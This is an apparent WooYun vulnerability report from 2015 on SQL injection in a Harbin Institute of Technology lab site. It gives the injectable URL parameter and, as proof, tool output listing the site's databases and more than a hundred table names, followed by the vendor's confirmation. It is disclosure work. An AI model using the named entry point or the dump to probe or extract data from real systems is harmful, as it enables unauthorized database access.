漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0136740
漏洞标题:哈尔滨工业大学某分站SQL注入漏洞
相关厂商:哈尔滨工业大学
漏洞作者: 路人甲
提交时间:2015-08-25 09:51
修复时间:2015-10-12 17:22
公开时间:2015-10-12 17:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-28: 厂商已经确认,细节仅向厂商公开
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开
简要描述:
过滤不严密
详细说明:
http://me.hit.edu.cn/lab/newslist.aspx?newclassid=89
......
漏洞证明:
available databases [11]:
[*] aspnetdb
[*] HitDb
[*] Labreservation
[*] master
[*] modeh
[*] msdb
[*] QsgNetSchoolDb
[*] qsgnetschoolview
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[08:44:07] [INFO] fetching tables for database: QsgNetSchoolDb
[08:44:07] [INFO] fetching number of tables for database 'QsgNetSc
[08:44:07] [INFO] resumed: 112
[08:44:07] [INFO] resumed: dbo.adlsUserName
[08:44:07] [INFO] resumed: dbo.BaseResource
[08:44:07] [INFO] resumed: dbo.Card
[08:44:07] [INFO] resumed: dbo.CardBatchInfo
[08:44:07] [INFO] resumed: dbo.CardOrder
[08:44:07] [INFO] resumed: dbo.CardType
[08:44:07] [INFO] resumed: dbo.ChargeCategory
[08:44:07] [INFO] resumed: dbo.ChargeCompagesType
[08:44:07] [INFO] resumed: dbo.CNCCardType
[08:44:07] [INFO] resumed: dbo.CostStrategy
[08:44:07] [INFO] resumed: dbo.CostType
[08:44:07] [INFO] resumed: dbo.CustomCostType
[08:44:07] [INFO] resumed: dbo.deldfjn
[08:44:07] [INFO] resumed: dbo.DisplayMode
[08:44:07] [INFO] resumed: dbo.error
[08:44:07] [INFO] resumed: dbo.Evaluation
[08:44:07] [INFO] resumed: dbo.FreeCard
[08:44:07] [INFO] resumed: dbo.FreeCardBindBatchAndNumber
[08:44:07] [INFO] resumed: dbo.Ful@CountType
[08:44:07] [INFO] resumed: dbo.grade
[08:44:07] [INFO] resumed: dbo.GradeSubjectChargeCategoryRelation
[08:44:07] [INFO] resumed: dbo.GradeType
[08:44:07] [INFO] resumed: dbo.GuestBook
[08:44:07] [INFO] resumed: dbo.GuestBookType
[08:44:07] [INFO] resumed: dbo.IcpInfo
[08:44:07] [INFO] resumed: dbo.LearnTeam
[08:44:07] [INFO] resumed: dbo.LearnTeamMember
[08:44:07] [INFO] resumed: dbo.LearnTeamRole
[08:44:07] [INFO] resumed: dbo.lesson
[08:44:07] [INFO] resumed: dbo.LessonMessages
[08:44:07] [INFO] resumed: dbo.LessonNotification
[08:44:07] [INFO] resumed: dbo.LessonNotificationTitle
[08:44:07] [INFO] resumed: dbo.maxBind
[08:44:07] [INFO] resumed: dbo.MenuInfo
[08:44:07] [INFO] resumed: dbo.metadata
[08:44:07] [INFO] resumed: dbo.metadata3
[08:44:07] [INFO] resumed: dbo.newdele
[08:44:07] [INFO] resumed: dbo.News
[08:44:07] [INFO] resumed: dbo.NewsClass
[08:44:07] [INFO] resumed: dbo.NewsClassfromAccess
[08:44:07] [INFO] resumed: dbo.NewsfromAccess
[08:44:07] [INFO] resumed: dbo.NewsTemplate
[08:44:07] [INFO] resumed: dbo.NewsTopic
[08:44:07] [INFO] resumed: dbo.nGrade
[08:44:07] [INFO] resumed: dbo.nGradeSubjectRelation
[08:44:07] [INFO] resumed: dbo.nGradeType
[08:44:07] [INFO] resumed: dbo.nGradeTypeRelation
[08:44:07] [INFO] resumed: dbo.NGradeTypeRelationOperationTypeView
[08:44:07] [INFO] resumed: dbo.nodeProperties
[08:44:07] [INFO] resumed: dbo.Operation
[08:44:07] [INFO] resumed: dbo.OperationItem
[08:44:07] [INFO] resumed: dbo.OperationLog
[08:44:07] [INFO] resumed: dbo.OperationLogType
[08:44:07] [INFO] resumed: dbo.OperationStatus
[08:44:07] [INFO] resumed: dbo.OperationType
[08:44:07] [INFO] resumed: dbo.OperationTypeOrder
[08:44:07] [INFO] resumed: dbo.OrderType
[08:44:07] [INFO] resumed: dbo.Organization
[08:44:07] [INFO] resumed: dbo.playverf
[08:44:07] [INFO] resumed: dbo.Question
[08:44:07] [INFO] resumed: dbo.QuestionDifficult
[08:44:07] [INFO] resumed: dbo.QuestionSelection
[08:44:07] [INFO] resumed: dbo.QuestionType
[08:44:07] [INFO] resumed: dbo.ResourceExceReader
[08:44:07] [INFO] resumed: dbo.ResourceStat@s
[08:44:07] [INFO] resumed: dbo.resourceType
[08:44:07] [INFO] resumed: dbo.Rights
[08:44:07] [INFO] resumed: dbo.RightsStatus
[08:44:07] [INFO] resumed: dbo.search
[08:44:07] [INFO] resumed: dbo.site
[08:44:07] [INFO] resumed: dbo.SiteCostStrategy
[08:44:07] [INFO] resumed: dbo.SiteDomainNameList
[08:44:07] [INFO] resumed: dbo.SiteNewsBind
[08:44:07] [INFO] resumed: dbo.SiteTeacherBind
[08:44:07] [INFO] resumed: dbo.SiteThemes
[08:44:07] [INFO] resumed: dbo.StudentAward
[08:44:07] [INFO] resumed: dbo.subject
[08:44:07] [INFO] resumed: dbo.SystemDefineTime
[08:44:07] [INFO] resumed: dbo.Teacher
[08:44:07] [INFO] resumed: dbo.TeacherArti`leRelation
[08:44:07] [INFO] resumed: dbo.TeacherAttribute
[08:44:07] [INFO] resumed: dbo.TeacherCommendType
[08:44:07] [INFO] resumed: dbo.TeacherGrade
[08:44:07] [INFO] resumed: dbo.teacherGradeOperationBind
[08:44:07] [INFO] resumed: dbo.teacherOnlineMode
[08:44:07] [INFO] resumed: dbo.TeacherSubjectAppraise
[08:44:07] [INFO] resumed: dbo.temp_Card
[08:44:07] [INFO] resumed: dbo.TempBaseResource
[08:44:07] [INFO] resumed: dbo.TempBaseResource2
[08:44:07] [INFO] resumed: dbo.TempBaseResourceMax
[08:44:07] [INFO] resumed: dbo.tempnews
[08:44:07] [INFO] resumed: dbo.TestCommendInfo
[08:44:07] [INFO] resumed: dbo.testPaper
[08:44:07] [INFO] resumed: dbo.testQuestionRelation
[08:44:07] [INFO] resumed: dbo.trend
[08:44:07] [INFO] resumed: dbo.updatedfjn
[08:44:07] [INFO] resumed: dbo.Us`r
[08:44:07] [INFO] resumed: dbo.UserDeait
[08:44:07] [INFO] resumed: dbo.UserExam
[08:44:07] [INFO] resumed: dbo.userFauorites
[08:44:07] [INFO] resumed: dbo.userFavoritesResourceRelation
[08:44:07] [INFO] resumed: dbo.UserFu@lCopnt
[08:44:07] [INFO] resumed: dbo.userInfo
[08:44:07] [INFO] resumed: dbo.UserOrder
[08:44:07] [INFO] resumed: dbo.UserOrderStatus
[08:44:07] [INFO] resumed: dbo.UserResource
[08:44:07] [INFO] resumed: dbo.UserResourceType
[08:44:07] [INFO] resumed: dbo.UserRoke
[08:44:07] [INFO] resumed: dbo.userSubjectBind
[08:44:07] [INFO] resumed: dbo.UserSubjectBindView
[08:44:07] [INFO] resumed: dbo.version
[08:44:07] [INFO] resumed: dbo.video
.........
修复方案:
过滤,限制,添加规则。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:3
确认时间:2015-08-28 17:21
厂商回复:
十分感谢
最新状态:
暂无